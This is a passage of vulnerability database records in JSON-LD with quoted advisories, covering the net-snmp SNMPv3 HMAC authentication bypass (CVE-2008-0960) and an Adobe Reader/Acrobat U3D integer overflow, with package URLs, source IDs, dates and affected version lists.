            "url": "http://ports.ubuntu.com/pool/main/n/net-snmp/snmpd_5.4.1~dfsg-7.1ubuntu6.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.2.1.2-4ubuntu2.3_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.4.1~dfsg-7.1ubuntu6.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-perl_5.4.1~dfsg-7.1ubuntu6.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/universe/n/net-snmp/libsnmp-python_5.4.1~dfsg-7.1ubuntu6.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.4.1~dfsg-7.1ubuntu6.1.dsc"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.4.1~dfsg-4ubuntu4.2.diff.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.3.1-6ubuntu2.2_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.2.1.2-4ubuntu2.3_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-perl_5.4.1~dfsg-4ubuntu4.2_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.2.1.2-4ubuntu2.3_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-perl_5.4.1~dfsg-4ubuntu4.2_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.3.1-6ubuntu2.2_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/universe/n/net-snmp/libsnmp-python_5.4.1~dfsg-4ubuntu4.2_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.3.1-6ubuntu2.2_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/n/net-snmp/libsnmp-python_5.4.1~dfsg-7.1ubuntu6.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-dev_5.4.1~dfsg-7.1ubuntu6.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.4.1~dfsg.orig.tar.gz"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-dev_5.4.1~dfsg-4ubuntu4.2_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-dev_5.4.1~dfsg-7.1ubuntu6.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/n/net-snmp/snmp_5.4.1~dfsg-4ubuntu4.2_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.2.1.2-4ubuntu2.3.dsc"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-dev_5.3.1-6ubuntu2.2_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-perl_5.4.1~dfsg-7.1ubuntu6.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-perl_5.3.1-6ubuntu2.2_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp9-dev_5.2.1.2-4ubuntu2.3_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/n/net-snmp/snmp_5.4.1~dfsg-4ubuntu4.2_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.2.1.2-4ubuntu2.3_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp10_5.3.1-6ubuntu2.2_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.2.1.2-4ubuntu2.3.diff.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.2.1.2-4ubuntu2.3_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/n/net-snmp/tkmib_5.2.1.2-4ubuntu2.3_all.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.2.1.2-4ubuntu2.3_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.2.1.2-4ubuntu2.3_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.3.1-6ubuntu2.2.diff.gz"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/n/net-snmp/snmpd_5.4.1~dfsg-4ubuntu4.2_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp9-dev_5.2.1.2-4ubuntu2.3_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/universe/n/net-snmp/libsnmp-python_5.4.1~dfsg-7.1ubuntu6.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/n/net-snmp/snmpd_5.4.1~dfsg-4ubuntu4.2_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.3.1-6ubuntu2.2_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/universe/n/net-snmp/libsnmp-python_5.4.1~dfsg-4ubuntu4.2_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp15_5.4.1~dfsg-7.1ubuntu6.1_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-dev_5.4.1~dfsg-7.1ubuntu6.1_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/n/net-snmp/tkmib_5.4.1~dfsg-4ubuntu4.2_all.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-dev_5.4.1~dfsg-7.1ubuntu6.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://www.vmware.com/support/vi3/doc/releasenotes_esx303.html"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-5135"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-1927"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2008-1927"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-5135"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3108"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-3108"
          },
          {
            "trust": 0.1,
            "url": "http://www.mandriva.com/security/"
          },
          {
            "trust": 0.1,
            "url": "http://www.mandriva.com/security/advisories"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#878044"
          },
          {
            "db": "VULHUB",
            "id": "VHN-31085"
          },
          {
            "db": "BID",
            "id": "29623"
          },
          {
            "db": "PACKETSTORM",
            "id": "71406"
          },
          {
            "db": "PACKETSTORM",
            "id": "67140"
          },
          {
            "db": "PACKETSTORM",
            "id": "71748"
          },
          {
            "db": "PACKETSTORM",
            "id": "68741"
          },
          {
            "db": "PACKETSTORM",
            "id": "72606"
          },
          {
            "db": "PACKETSTORM",
            "id": "69029"
          },
          {
            "db": "PACKETSTORM",
            "id": "67532"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200806-140"
          },
          {
            "db": "NVD",
            "id": "CVE-2008-0960"
          }
        ]
      },
      "sources": {
        "_id": null,
        "data": [
          {
            "db": "CERT/CC",
            "id": "VU#878044",
            "ident": null
          },
          {
            "db": "VULHUB",
            "id": "VHN-31085",
            "ident": null
          },
          {
            "db": "BID",
            "id": "29623",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "71406",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "67140",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "71748",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "68741",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "72606",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "69029",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "67532",
            "ident": null
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200806-140",
            "ident": null
          },
          {
            "db": "NVD",
            "id": "CVE-2008-0960",
            "ident": null
          }
        ]
      },
      "sources_release_date": {
        "_id": null,
        "data": [
          {
            "date": "2008-06-10T00:00:00",
            "db": "CERT/CC",
            "id": "VU#878044",
            "ident": null
          },
          {
            "date": "2008-06-10T00:00:00",
            "db": "VULHUB",
            "id": "VHN-31085",
            "ident": null
          },
          {
            "date": "2008-06-10T00:00:00",
            "db": "BID",
            "id": "29623",
            "ident": null
          },
          {
            "date": "2008-10-31T18:41:56",
            "db": "PACKETSTORM",
            "id": "71406",
            "ident": null
          },
          {
            "date": "2008-06-11T00:30:32",
            "db": "PACKETSTORM",
            "id": "67140",
            "ident": null
          },
          {
            "date": "2008-11-09T21:15:50",
            "db": "PACKETSTORM",
            "id": "71748",
            "ident": null
          },
          {
            "date": "2008-08-01T20:22:12",
            "db": "PACKETSTORM",
            "id": "68741",
            "ident": null
          },
          {
            "date": "2008-12-04T02:50:13",
            "db": "PACKETSTORM",
            "id": "72606",
            "ident": null
          },
          {
            "date": "2008-08-13T04:58:12",
            "db": "PACKETSTORM",
            "id": "69029",
            "ident": null
          },
          {
            "date": "2008-06-21T01:10:58",
            "db": "PACKETSTORM",
            "id": "67532",
            "ident": null
          },
          {
            "date": "2008-06-10T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-200806-140",
            "ident": null
          },
          {
            "date": "2008-06-10T18:32:00",
            "db": "NVD",
            "id": "CVE-2008-0960",
            "ident": null
          }
        ]
      },
      "sources_update_date": {
        "_id": null,
        "data": [
          {
            "date": "2009-07-16T00:00:00",
            "db": "CERT/CC",
            "id": "VU#878044",
            "ident": null
          },
          {
            "date": "2018-10-30T00:00:00",
            "db": "VULHUB",
            "id": "VHN-31085",
            "ident": null
          },
          {
            "date": "2015-04-13T22:21:00",
            "db": "BID",
            "id": "29623",
            "ident": null
          },
          {
            "date": "2011-07-15T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-200806-140",
            "ident": null
          },
          {
            "date": "2025-04-09T00:30:58.490000",
            "db": "NVD",
            "id": "CVE-2008-0960",
            "ident": null
          }
        ]
      },
      "threat_type": {
        "_id": null,
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "71748"
          },
          {
            "db": "PACKETSTORM",
            "id": "72606"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200806-140"
          }
        ],
        "trust": 0.8
      },
      "title": {
        "_id": null,
        "data": "SNMPv3 improper HMAC validation allows authentication bypass",
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#878044"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "_id": null,
        "data": "authorization issue",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-200806-140"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-200912-0743

    Vulnerability from variot - Updated: 2026-03-09 22:59

    Integer overflow in the U3D implementation in Adobe Reader and Acrobat 9.x before 9.3, and 8.x before 8.2 on Windows and Mac OS X, allows remote attackers to execute arbitrary code via a malformed PDF document. An attacker can exploit this issue by supplying a malicious PDF file or webpage. Failed attempts will likely result in denial-of-service conditions. NOTE: This issue was previously covered in BID 37667 (Adobe Acrobat and Reader January 2010 Multiple Remote Vulnerabilities), but has been given its own record to better document it. The Adobe Reader browser plug-in is available for several web browsers and operating systems and will automatically open PDF documents on websites. They are used to create, view, search, digitally sign, verify, print, and collaborate on Adobe PDF files.

    II.

    III. AFFECTED PRODUCTS

    Adobe Reader version 9.2 and prior Adobe Acrobat version 9.2 and prior

    IV. Exploits - PoCs & Binary Analysis

    In-depth binary analysis of the vulnerability and a code execution exploit have been released by VUPEN Security through the VUPEN Exploits & PoCs Service :

    http://www.vupen.com/exploits

    V. SOLUTION

    Upgrade to version 9.3 or 8.2.

    VI. CREDIT

    The vulnerability was discovered by Nicolas JOLY of VUPEN Security

    VII. ABOUT VUPEN Security

    VUPEN is a leading IT security research company providing vulnerability management services to allow enterprises and organizations to eliminate vulnerabilities before they can be exploited, ensure security policy compliance and meaningfully measure and manage risks.

    VUPEN also provides research services for security vendors (antivirus, IDS, IPS,etc) to supplement their internal vulnerability research efforts and quickly develop vulnerability-based and exploit-based signatures, rules, and filters, and proactively protect their customers against potential threats.

    • VUPEN Vulnerability Notification Service:

    http://www.vupen.com/english/services

    • VUPEN Exploits and In-Depth Vulnerability Analysis:

    http://www.vupen.com/exploits

    VIII. REFERENCES

    http://www.vupen.com/english/advisories/2010/0103 http://www.adobe.com/support/security/bulletins/apsb10-02.html

    IX. DISCLOSURE TIMELINE

    2009-11-06 - Vendor notified 2009-11-06 - Vendor response 2009-12-10 - Status update received 2010-01-07 - Status update received 2009-01-13 - Coordinated public Disclosure

    . ----------------------------------------------------------------------

    Do you have VARM strategy implemented?

    (Vulnerability Assessment Remediation Management)

    If not, then implement it through the most reliable vulnerability intelligence source on the market.

    Implement it through Secunia.

    For more information visit: http://secunia.com/advisories/business_solutions/

    Alternatively request a call from a Secunia representative today to discuss how we can help you with our capabilities contact us at: sales@secunia.com


    TITLE: Adobe Reader/Acrobat Code Execution Vulnerability

    SECUNIA ADVISORY ID: SA37690

    VERIFY ADVISORY: http://secunia.com/advisories/37690/

    DESCRIPTION: A vulnerability has been reported in Adobe Reader and Acrobat, which can be exploited by malicious people to compromise a user's system.

    NOTE: This vulnerability is currently being actively exploited.

    The vulnerability is reported in versions 9.2 and prior.

    SOLUTION: Do not open untrusted PDF files.

    Do not visit untrusted websites or follow untrusted links.

    PROVIDED AND/OR DISCOVERED BY: Reported as a 0-day.

    ORIGINAL ADVISORY: http://blogs.adobe.com/psirt/2009/12/new_adobe_reader_and_acrobat_v.html


    About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.

    Subscribe: http://secunia.com/advisories/secunia_security_advisories/

    Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/

    Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.


    Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org


    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-200912-0743",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "adobe",
            "version": "8.1"
          },
          {
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "adobe",
            "version": "7.0.7"
          },
          {
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "adobe",
            "version": "7.1.3"
          },
          {
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "adobe",
            "version": "7.0.8"
          },
          {
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "adobe",
            "version": "7.1.1"
          },
          {
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "adobe",
            "version": "7.0.9"
          },
          {
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "adobe",
            "version": "7.1.2"
          },
          {
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "adobe",
            "version": "7.1.0"
          },
          {
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "adobe",
            "version": "7.1.4"
          },
          {
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "adobe",
            "version": "9.1.1"
          },
          {
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "7.0.8"
          },
          {
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "8.1"
          },
          {
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "9.1.1"
          },
          {
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "9.1.2"
          },
          {
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "9.1"
          },
          {
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "5.0.6"
          },
          {
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "8.1.1"
          },
          {
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "5.0.5"
          },
          {
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "8.1.6"
          },
          {
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "3.0"
          },
          {
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "7.0.4"
          },
          {
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "9.0"
          },
          {
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "8.1.5"
          },
          {
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "4.0.5a"
          },
          {
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "4.0"
          },
          {
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "6.0.2"
          },
          {
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "9.1.3"
          },
          {
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "7.1.0"
          },
          {
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "5.0.11"
          },
          {
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "5.0.6"
          },
          {
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "6.0.5"
          },
          {
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "6.0.6"
          },
          {
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "9.1.2"
          },
          {
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "7.0.1"
          },
          {
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "8.1.4"
          },
          {
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "5.0.5"
          },
          {
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "3.01"
          },
          {
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "6.0"
          },
          {
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "4.0.5"
          },
          {
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "7.0.7"
          },
          {
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "8.1.6"
          },
          {
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "5.0.10"
          },
          {
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "6.0.3"
          },
          {
            "model": "acrobat reader",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "9.2"
          },
          {
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "6.0.4"
          },
          {
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "9.0"
          },
          {
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "8.1.5"
          },
          {
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "7.0.9"
          },
          {
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "8.1.2"
          },
          {
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "6.0.2"
          },
          {
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "9.1.3"
          },
          {
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "4.0.5c"
          },
          {
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "4.5"
          },
          {
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "7.0.2"
          },
          {
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "7.1.3"
          },
          {
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "6.0.5"
          },
          {
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "6.0.1"
          },
          {
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "7.0.6"
          },
          {
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "7.0.1"
          },
          {
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "8.1.4"
          },
          {
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "7.0.5"
          },
          {
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "8.1.7"
          },
          {
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "5.1"
          },
          {
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "5.0"
          },
          {
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "3.02"
          },
          {
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "6.0"
          },
          {
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "7.0"
          },
          {
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "4.0.5"
          },
          {
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "5.0.10"
          },
          {
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "6.0.3"
          },
          {
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "8.1.3"
          },
          {
            "model": "acrobat",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "9.2"
          },
          {
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "7.0.3"
          },
          {
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "6.0.4"
          },
          {
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "8.0"
          },
          {
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "8.1.2"
          },
          {
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "4.0.5c"
          },
          {
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "7.0.2"
          },
          {
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "7.1.2"
          },
          {
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "7.0.6"
          },
          {
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "6.0.1"
          },
          {
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "5.0.9"
          },
          {
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "8.1.7"
          },
          {
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "8.1.1"
          },
          {
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "7.0.5"
          },
          {
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "9.1"
          },
          {
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "5.0"
          },
          {
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "7.0"
          },
          {
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "3.0"
          },
          {
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "7.0.4"
          },
          {
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "7.1.1"
          },
          {
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "7.0.3"
          },
          {
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "8.0"
          },
          {
